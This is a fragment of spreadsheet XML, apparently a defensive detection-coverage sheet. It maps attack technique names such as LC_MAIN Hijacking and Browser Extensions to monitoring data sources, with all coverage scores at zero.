      <c r="B140" s="41" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C140" s="45"/>
      <c r="D140" s="45"/>
      <c r="E140" s="45"/>
      <c r="F140" s="14">
        <v>0</v>
      </c>
      <c r="G140" s="14">
        <v>0</v>
      </c>
      <c r="H140" s="14">
        <v>0</v>
      </c>
      <c r="I140" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K140" s="46" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
    </row>
    <row r="141" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A141" s="43" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="41" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C141" s="45"/>
      <c r="D141" s="45"/>
      <c r="E141" s="45"/>
      <c r="F141" s="14">
        <v>0</v>
      </c>
      <c r="G141" s="14">
        <v>0</v>
      </c>
      <c r="H141" s="14">
        <v>0</v>
      </c>
      <c r="I141" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K141" s="46" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="142" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A142" s="43" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="41" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C142" s="45"/>
      <c r="D142" s="45"/>
      <c r="E142" s="45"/>
      <c r="F142" s="14">
        <v>0</v>
      </c>
      <c r="G142" s="14">
        <v>0</v>
      </c>
      <c r="H142" s="14">
        <v>0</v>
      </c>
      <c r="I142" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K142" s="46" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="143" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A143" s="43" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="41" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C143" s="45"/>
      <c r="D143" s="45"/>
      <c r="E143" s="45"/>
      <c r="F143" s="14">
        <v>0</v>
      </c>
      <c r="G143" s="14">
        <v>0</v>
      </c>
      <c r="H143" s="14">
        <v>0</v>
      </c>
      <c r="I143" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K143" s="46" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="144" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A144" s="43" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="41" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C144" s="45"/>
      <c r="D144" s="45"/>
      <c r="E144" s="45"/>
      <c r="F144" s="14">
        <v>0</v>
      </c>
      <c r="G144" s="14">
        <v>0</v>
      </c>
      <c r="H144" s="14">
        <v>0</v>
      </c>
      <c r="I144" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K144" s="46" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="145" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A145" s="43" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="41" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C145" s="45"/>
      <c r="D145" s="45"/>
      <c r="E145" s="45"/>
      <c r="F145" s="14">
        <v>0</v>
      </c>
      <c r="G145" s="14">
        <v>0</v>
      </c>
      <c r="H145" s="14">
        <v>0</v>
      </c>
      <c r="I145" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K145" s="46" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="146" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A146" s="43" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="41" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C146" s="45"/>
      <c r="D146" s="45"/>
      <c r="E146" s="45"/>
      <c r="F146" s="14">
        <v>0</v>
      </c>
      <c r="G146" s="14">
        <v>0</v>
      </c>
      <c r="H146" s="14">
        <v>0</v>
      </c>
      <c r="I146" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K146" s="46" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="147" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A147" s="43" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="41" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C147" s="45"/>
      <c r="D147" s="45"/>
      <c r="E147" s="45"/>
      <c r="F147" s="14">
        <v>0</v>
      </c>
      <c r="G147" s="14">
        <v>0</v>
      </c>
      <c r="H147" s="14">
        <v>0</v>
      </c>
      <c r="I147" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K147" s="46" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="148" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A148" s="43" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="41" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C148" s="45"/>
      <c r="D148" s="45"/>
      <c r="E148" s="45"/>
      <c r="F148" s="14">
        <v>0</v>
      </c>
      <c r="G148" s="14">
        <v>0</v>
      </c>
      <c r="H148" s="14">
        <v>0</v>
      </c>
      <c r="I148" s="32">
        <f t="shared" ref="I148:I211" si="4">((F148*2)+G148+(H148*2))/5</f>
        <v>0</v>
      </c>
      <c r="K148" s="46" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="149" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A149" s="43" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="41" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C149" s="45"/>
      <c r="D149" s="45"/>
      <c r="E149" s="45"/>
      <c r="F149" s="14">
        <v>0</v>
      </c>
      <c r="G149" s="14">
        <v>0</v>
      </c>
      <c r="H149" s="14">
        <v>0</v>
      </c>
      <c r="I149" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K149" s="46" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="150" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A150" s="43" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="41" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C150" s="45"/>
      <c r="D150" s="45"/>
      <c r="E150" s="45"/>
      <c r="F150" s="14">
        <v>0</v>
      </c>
      <c r="G150" s="14">
        <v>0</v>
      </c>
      <c r="H150" s="14">
        <v>0</v>
      </c>
      <c r="I150" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K150" s="46" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="151" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A151" s="43" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="41" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C151" s="45"/>
      <c r="D151" s="45"/>
      <c r="E151" s="45"/>
      <c r="F151" s="14">
        <v>0</v>
      </c>
      <c r="G151" s="14">
        <v>0</v>
      </c>
      <c r="H151" s="14">
        <v>0</v>
      </c>
      <c r="I151" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K151" s="46" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="152" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A152" s="43" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="41" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C152" s="45"/>
      <c r="D152" s="45"/>
      <c r="E152" s="45"/>
      <c r="F152" s="14">
        <v>0</v>
      </c>
      <c r="G152" s="14">
        <v>0</v>
      </c>
      <c r="H152" s="14">
        <v>0</v>
      </c>
      <c r="I152" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K152" s="46" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="153" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A153" s="43" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="41" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C153" s="45"/>
      <c r="D153" s="45"/>
      <c r="E153" s="45"/>
      <c r="F153" s="14">
        <v>0</v>
      </c>
      <c r="G153" s="14">
        <v>0</v>
      </c>
      <c r="H153" s="14">
        <v>0</v>
      </c>
      <c r="I153" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K153" s="46" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="154" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A154" s="43" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="41" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C154" s="45"/>
      <c r="D154" s="45"/>
      <c r="E154" s="45"/>
      <c r="F154" s="14">
        <v>0</v>
      </c>
      <c r="G154" s="14">
        <v>0</v>
      </c>
      <c r="H154" s="14">
        <v>0</v>
      </c>
      <c r="I154" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K154" s="46" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="155" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A155" s="43" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="41" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C155" s="45"/>
      <c r="D155" s="45"/>
      <c r="E155" s="45"/>
      <c r="F155" s="14">
        <v>0</v>
      </c>
      <c r="G155" s="14">
        <v>0</v>
      </c>
      <c r="H155" s="14">
        <v>0</v>
      </c>
      <c r="I155" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K155" s="46" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="156" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A156" s="43" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="41" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C156" s="45"/>
      <c r="D156" s="45"/>
      <c r="E156" s="45"/>
      <c r="F156" s="14">
        <v>0</v>
      </c>
      <c r="G156" s="14">
        <v>0</v>
      </c>
      <c r="H156" s="14">
        <v>0</v>
      </c>
      <c r="I156" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K156" s="46" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="157" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A157" s="43" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="41" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C157" s="45"/>
      <c r="D157" s="45"/>
      <c r="E157" s="45"/>
      <c r="F157" s="14">
        <v>0</v>
      </c>
      <c r="G157" s="14">
        <v>0</v>
      </c>
      <c r="H157" s="14">
        <v>0</v>
      </c>
      <c r="I157" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K157" s="46" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="158" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A158" s="43" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="41" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C158" s="45"/>
      <c r="D158" s="45"/>
      <c r="E158" s="45"/>
      <c r="F158" s="14">
        <v>0</v>
      </c>
      <c r="G158" s="14">
        <v>0</v>
      </c>
      <c r="H158" s="14">
        <v>0</v>
      </c>
      <c r="I158" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K158" s="46" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="159" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A159" s="43" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="41" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C159" s="45"/>
      <c r="D159" s="45"/>
      <c r="E159" s="45"/>
      <c r="F159" s="14">
        <v>0</v>
      </c>
      <c r="G159" s="14">
        <v>0</v>
      </c>
      <c r="H159" s="14">
        <v>0</v>
      </c>
      <c r="I159" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K159" s="46" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="160" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A160" s="43" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="41" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C160" s="45"/>
      <c r="D160" s="45"/>
      <c r="E160" s="45"/>
      <c r="F160" s="14">
        <v>0</v>
      </c>
      <c r="G160" s="14">
        <v>0</v>
      </c>
      <c r="H160" s="14">
        <v>0</v>
      </c>
      <c r="I160" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K160" s="46" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="161" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A161" s="43" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="41" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C161" s="45"/>
      <c r="D161" s="45"/>
      <c r="E161" s="45"/>
      <c r="F161" s="14">
        <v>0</v>
      </c>
      <c r="G161" s="14">
        <v>0</v>
      </c>
      <c r="H161" s="14">
        <v>0</v>
      </c>
      <c r="I161" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K161" s="46" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="162" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A162" s="43" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="41" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C162" s="45"/>
      <c r="D162" s="45"/>
      <c r="E162" s="45"/>
      <c r="F162" s="14">
        <v>0</v>
      </c>
      <c r="G162" s="14">
        <v>0</v>
      </c>
      <c r="H162" s="14">
        <v>0</v>
      </c>
      <c r="I162" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K162" s="46" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="163" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A163" s="43" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="41" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C163" s="45"/>
      <c r="D163" s="45"/>
      <c r="E163" s="45"/>
      <c r="F163" s="14">
        <v>0</v>
      </c>
      <c r="G163" s="14">
        <v>0</v>
      </c>
      <c r="H163" s="14">
        <v>0</v>
      </c>
      <c r="I163" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K163" s="46" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="164" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A164" s="43" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="41" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C164" s="45"/>
      <c r="D164" s="45"/>
      <c r="E164" s="45"/>
      <c r="F164" s="14">
        <v>0</v>
      </c>
      <c r="G164" s="14">
        <v>0</v>
      </c>
      <c r="H164" s="14">
        <v>0</v>
      </c>
      <c r="I164" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K164" s="46" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="165" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A165" s="43" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="41" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C165" s="45"/>
      <c r="D165" s="45"/>
      <c r="E165" s="45"/>
      <c r="F165" s="14">
        <v>0</v>
      </c>
      <c r="G165" s="14">
        <v>0</v>
      </c>
      <c r="H165" s="14">
        <v>0</v>
      </c>
      <c r="I165" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K165" s="46" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="166" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A166" s="43" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="41" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C166" s="45"/>
      <c r="D166" s="45"/>
      <c r="E166" s="45"/>
      <c r="F166" s="14">
        <v>0</v>
      </c>
      <c r="G166" s="14">
        <v>0</v>
      </c>
      <c r="H166" s="14">
        <v>0</v>
      </c>
      <c r="I166" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K166" s="46" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="167" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A167" s="43" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="41" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C167" s="45"/>
      <c r="D167" s="45"/>
      <c r="E167" s="45"/>
      <c r="F167" s="14">
        <v>0</v>
      </c>
      <c r="G167" s="14">
        <v>0</v>
      </c>
      <c r="H167" s="14">
        <v>0</v>
      </c>
      <c r="I167" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K167" s="46" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="168" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A168" s="43" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="41" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C168" s="45"/>
      <c r="D168" s="45"/>
      <c r="E168" s="45"/>
      <c r="F168" s="14">
        <v>0</v>
      </c>
      <c r="G168" s="14">
        <v>0</v>
      </c>
      <c r="H168" s="14">
        <v>0</v>
      </c>
      <c r="I168" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K168" s="46" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="169" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A169" s="43" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="41" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C169" s="45"/>
      <c r="D169" s="45"/>
      <c r="E169" s="45"/>
      <c r="F169" s="14">
        <v>0</v>
      </c>
      <c r="G169" s="14">
        <v>0</v>
      </c>
      <c r="H169" s="14">
        <v>0</v>
      </c>
      <c r="I169" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K169" s="46" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="170" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A170" s="43" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="41" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C170" s="45"/>
      <c r="D170" s="45"/>
      <c r="E170" s="45"/>
      <c r="F170" s="14">
        <v>0</v>
      </c>
      <c r="G170" s="14">
        <v>0</v>
      </c>
      <c r="H170" s="14">
        <v>0</v>
      </c>
      <c r="I170" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K170" s="46" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="171" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A171" s="43" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="41" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C171" s="45"/>
      <c r="D171" s="45"/>
      <c r="E171" s="45"/>
      <c r="F171" s="14">
        <v>0</v>
      </c>
      <c r="G171" s="14">
        <v>0</v>
      </c>
      <c r="H171" s="14">
        <v>0</v>
      </c>
      <c r="I171" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K171" s="46" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="172" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A172" s="43" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="41" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C172" s="45"/>
      <c r="D172" s="45"/>
      <c r="E172" s="45"/>
      <c r="F172" s="14">
        <v>0</v>
      </c>
      <c r="G172" s="14">
        <v>0</v>
      </c>
      <c r="H172" s="14">
        <v>0</v>
      </c>
      <c r="I172" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K172" s="46" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="173" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A173" s="43" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="41" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C173" s="45"/>
      <c r="D173" s="45"/>
      <c r="E173" s="45"/>
      <c r="F173" s="14">
        <v>0</v>
      </c>
      <c r="G173" s="14">
        <v>0</v>
      </c>
      <c r="H173" s="14">
        <v>0</v>
      </c>
      <c r="I173" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K173" s="46" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="174" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A174" s="43" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="41" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C174" s="45"/>
      <c r="D174" s="45"/>
      <c r="E174" s="45"/>
      <c r="F174" s="14">
        <v>0</v>
      </c>
      <c r="G174" s="14">
        <v>0</v>
      </c>
      <c r="H174" s="14">
        <v>0</v>
      </c>
      <c r="I174" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K174" s="46" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="175" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A175" s="43" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="41" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C175" s="45"/>
      <c r="D175" s="45"/>
      <c r="E175" s="45"/>
      <c r="F175" s="14">
        <v>0</v>
      </c>
      <c r="G175" s="14">
        <v>0</v>
      </c>
      <c r="H175" s="14">
        <v>0</v>
      </c>
      <c r="I175" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K175" s="46" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="176" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A176" s="43" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="41" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:B)</f>
        <v>Component Object Model and Distributed COM</v>
      </c>
      <c r="C176" s="45"/>
      <c r="D176" s="45"/>
      <c r="E176" s="45"/>
      <c r="F176" s="14">
        <v>0</v>
      </c>
      <c r="G176" s="14">
        <v>0</v>
      </c>
      <c r="H176" s="14">
        <v>0</v>
      </c>
      <c r="I176" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K176" s="46" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
    </row>
    <row r="177" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A177" s="43" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="41" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C177" s="45"/>
      <c r="D177" s="45"/>
      <c r="E177" s="45"/>
      <c r="F177" s="14">
        <v>0</v>
      </c>
      <c r="G177" s="14">
        <v>0</v>
      </c>
      <c r="H177" s="14">
        <v>0</v>
      </c>
      <c r="I177" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K177" s="46" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="178" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A178" s="43" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="41" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C178" s="45"/>
      <c r="D178" s="45"/>
      <c r="E178" s="45"/>
      <c r="F178" s="14">
        <v>0</v>
      </c>
      <c r="G178" s="14">
        <v>0</v>
      </c>
      <c r="H178" s="14">
        <v>0</v>
      </c>
      <c r="I178" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
